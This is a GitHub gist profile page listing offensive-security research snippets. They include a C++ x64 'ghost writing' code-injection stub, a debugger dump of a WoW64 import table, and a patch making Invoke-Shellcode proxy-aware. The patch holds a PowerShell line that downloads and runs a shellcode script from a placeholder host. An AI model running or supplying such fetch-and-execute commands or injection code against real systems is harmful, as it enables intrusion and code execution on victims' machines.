Skip to content

Instantly share code, notes, and snippets.

View hatRiot's full-sized avatar

bryan alexander hatRiot

659 followers · 0 following
View GitHub Profile
@hatRiot
hatRiot / ghostwrite.cpp
Created August 22, 2019 04:55
ghostwrite x64
/*
simple x64 implementation of the ghost writing code injection technique. note this is JUST FOR REFERENCE and won't
work in your sweet new c2 off the shelf. it also uses capstone. check out pinjectra for a more feature rich and stable version of this.
*/
#include "stdafx.h"
#include <Windows.h>
#include "include/capstone/capstone.h"
#pragma comment(lib, "capstone.lib")
@hatRiot
hatRiot / gist:b42a33ad1310226bb1466e34f2e9d50c
Created June 11, 2019 18:43
WoW64 kernel32 IAT
0:023:x86> dt _IMAGE_IMPORT_DESCRIPTOR 0x40000+0x91d0+0n40
ole32!_IMAGE_IMPORT_DESCRIPTOR
+0x000 Characteristics : 0x9290
+0x000 OriginalFirstThunk : 0x9290
+0x004 TimeDateStamp : 0
+0x008 ForwarderChain : 0
+0x00c Name : 0x99be
+0x010 FirstThunk : 0x900c
0:023:x86> da 0x40000+0x99be
000499be "KERNEL32.dll"
@hatRiot
hatRiot / keybase.md
Created August 21, 2015 18:38

Keybase proof

I hereby claim:

  • I am hatRiot on github.
  • I am droner (https://keybase.io/droner) on keybase.
  • I have a public key whose fingerprint is B6F4 7EF5 4F44 CC36 1731 60E1 13A4 51C8 439D 800A

To claim this, I am signing this object:

@hatRiot
hatRiot / Invoke-Shellcode-Proxy
Last active May 7, 2016 16:58
Invoke-Shellcode proxy-aware
# apply to Invoke-Shellcode.ps1
# invoke with:
# PS > $wc = New-Object Net.WebClient ; $wc.UseDefaultCredentials = $true; $wc.Proxy.Credentials = $wc.Credentials ; iex $wc.DownloadString("http://host/Invoke-Shellcode.ps1")
596,599c596
<
< $proxy = [System.Net.WebRequest]::GetSystemWebProxy()
< $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
<
---